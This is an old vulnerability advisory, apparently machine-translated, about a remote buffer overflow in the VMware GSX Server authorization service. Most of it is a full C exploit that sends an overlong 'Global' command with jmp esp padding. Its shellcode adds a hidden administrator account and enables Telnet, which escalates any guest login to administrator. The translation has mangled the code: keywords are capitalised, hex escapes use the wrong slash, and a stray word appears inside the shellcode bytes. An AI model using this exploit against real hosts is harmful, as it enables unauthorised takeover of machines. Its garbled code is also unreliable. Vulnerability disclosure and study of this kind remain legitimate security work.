[Practice] VMware gsx Server Remote Buffer Overflow Vulnerability

VMware gsx Server Remote Buffer Overflow Vulnerability

Creation Time:
Article attributes: original
Article submission: zag23 (bigball_at_venustech.com.cn)

Author: zag & GLCs
Date: 2002/07/24
Affected Systems:
VMware gsx Server 2.0.0 build-2050 for Windows (other versions have not been tested)
+ Windows NT/2000/XP

Vulnerability description:
VMware gsx Server is a very popular virtual PC software with its Remote Access Management Service:
VMware Authorization Service has a buffer overflow problem, although the program is designed
But due to its design defects, this overflow can still be used in
Attackers can escalate any account to the Administrator to execute any code.

Vulnerability Analysis:

(Thanks to isno for leaving me many overflow references)
The VMware gsx Server communicates with the VMware remote console through
Port 902 and VMWare remote console opened by VMware Authorization Service
The handshake operation before data communication is as follows:

220 VMware authentication daemon Version 1.00
User anyuser
331 Password required for user.
Pass ******
230 user logged in.
Global server
200 connect global

The user, pass, and global commands have been limited in length. When the sending string is too long, the connection will be disconnected,
The system returns a message similar to 599 vmware-authd panic: Buffer Overflow in vmauthdsocketread ()
Message:
220 VMware authentication daemon Version 1.00
User Aaaa... (ax500)
599 vmware-authd panic: Buffer Overflow in vmauthdsocketread ()
However, when the Global Command uses a string that does not exceed the specified length as a parameter, overflow occurs.
Overflow causes the VMware Authorization Service to end abnormally. we can construct a short
Shellcode overwrites the return address to execute our code.

Assuming that you already have a guest account, we have written the following test code:

//////////////////////////////////////// ////////////////////////////
// Vmwareoverflowtest V1.0
// Written by zag & GLCs
// BigBall@venustech.com.cn glcs@venustech.com.cn
// Http://www.Venustech.com
//////////////////////////////////////// ////////////////////////////

# Include "stdio. H"
# Include "winsock2.h"
# Include "stdlib. H"
# Pragma comment (Lib, "ws2_32 ")

To ensure that the length of the shellcode code + the length of the global command does not exceed the maximum character limit, we
Specially compiled the shellcode below.
// Add an Administrator Account: x_adrc password: x_adrc
// Enable the Telnet Service
Unsigned char shellcode [] =
"/X68/xc1/x15/x35/x09/x81/x2c/x24"
"/X80/XD1/xf0/x08/x68/x63/x20/x20"
"/X2f/x68/x5f/x61/x64/x72/x68/x72"
"/X73/x20/x78/x68/x72/x61/x74/x6f"
"/X68/x6e/x69/x73/x74/x68/x61/x64"
"/X6d/x69/x68/x6f/x75/Cross/x20/x68"
"/X61/x6c/x67/x72/x68/x20/x6c/x6f"
"/X63/x68/X26/x6e/X65/x74/x68/x74"
"/X73/x76/x72/x68/x20/x74/x6c/x6e"
"/X68/x74/x61/x72/x74/x68/X65/x74"
"/X20/x73/x68/x44/x44/X26/x6e/x68"
"/X63/x20/x2f/x41/x68/x5f/x61/x64"
"/X72/x68/x72/x63/x20/x78/x68/x78"
"/X5f/x61/x64/x68/x73/X65/x72/x20"
"/X68/X65/x74/x20/x75/x68/x2f/x63"
"/X20/x6e/x68/x63/x6d/x64/x20/x8b"
"/Xc4/x6a/x01/x50/xb8/xc6/x84/xe6"
"/X77/xFF/xd0/x90 ";
Unsigned char jmp_esp_xp_eng [] = {0x1b, 0x17, 0xe3, 0x77}; // WINXP Eng
Unsigned char jmp_esp [4];

Void usage ()
{
Printf ("vmwareoverflowtest V1.0/n written by zag & GLCs/n Email: bigBall@venustech.com.cn/n Glcs@venustech.com.cn/n www.venustech.com/n/nusage:vmwareoverflowtest.exe <ip> <port> <username> <passwd> <OS type>/n/t0.windows XP eng/N ");
Return;
}

Int main (INT argc, char ** argv)
{
Char STR [4096];
Wsadata WSA;
Socket sock;
Struct sockaddr_in server;
Int ret;
Int I = 0;
If (argc! = 6)
{
Usage ();
Return 0;
}
Wsastartup (makeword (2, 2), & WSA );
Sock = socket (af_inet, sock_stream, ipproto_tcp );
Server. sin_family = af_inet;
Server. sin_port = htons (atoi (argv [2]);
Server. sin_addr.s_addr = inet_addr (argv [1]);

Switch (atoi (argv [5])
{
Case 0:
Shellcode [133] = 0xc6;
Shellcode [134] = 0x84;
Shellcode [135] = 0xe6;
Shellcode [136] = 0x77;

Strcpy (jmp_esp, jmp_esp_xp_eng );

Break;
Default:
Shellcode [133] = 0xc6;
Shellcode [134] = 0x84;
Shellcode [135] = 0xe6;
Shellcode [136] = 0x77;

Strcpy (jmp_esp, jmp_esp_xp_eng );
Break;
}
Ret = connect (sock, (struct sockaddr *) & server, sizeof (server ));

If (ret = socket_error)
{
Printf ("Connect error/N ");
Return-1;
}

Memset (STR, 0, sizeof (STR ));
Recv (sock, STR, 100, 0 );
Printf ("% s", STR );

Memset (STR, 0, sizeof (STR ));
Strcpy (STR, "user ");
Strcat (STR, argv [3]);
Strcat (STR, "/R/N ");
Ret = Send (sock, STR, strlen (STR), 0 );

Memset (STR, 0, sizeof (STR ));
Recv (sock, STR, 100, 0 );
Printf ("% s", STR );

Memset (STR, 0, sizeof (STR ));
Strcpy (STR, "pass ");
Strcat (STR, argv [4]);
Strcat (STR, "/R/N ");
Ret = Send (sock, STR, strlen (STR), 0 );

Memset (STR, 0, sizeof (STR ));
Ret = Recv (sock, STR, 100, 0 );
Printf ("% s", STR );

Memset (STR, 0, sizeof (STR ));
Strcpy (STR, "Global ");
// The semi-continuous coverage method does not need to be precisely located at the overflow point

For (I = 7; I <288; I + = 8)
{
Memcpy (STR + I, "/x90/x90/x58/x68", 4 );
Memcpy (STR + I + 4, jmp_esp, 4 );
}

Memcpy (STR + I, shellcode, strlen (shellcode ));
Strcat (STR, "/R/N ");
Ret = Send (sock, STR, strlen (STR), 0 );
Printf ("done! /N ");
Closesocket (sock );
Wsacleanup ();
Return 1;
}

After compiling and running this code in VC, use User: x_adrc pass: x_adrc to remotely telnet to the target host,
Check the x_adrc account and you will find that x_adrc belongs to the Administrator Group. At this time, the Administrator has been obtained through any account.
Permission.

References:
Yuange <string buffer overflow attack technology of widechar> semi-continuous coverage
About us:
Venustech-ADRC)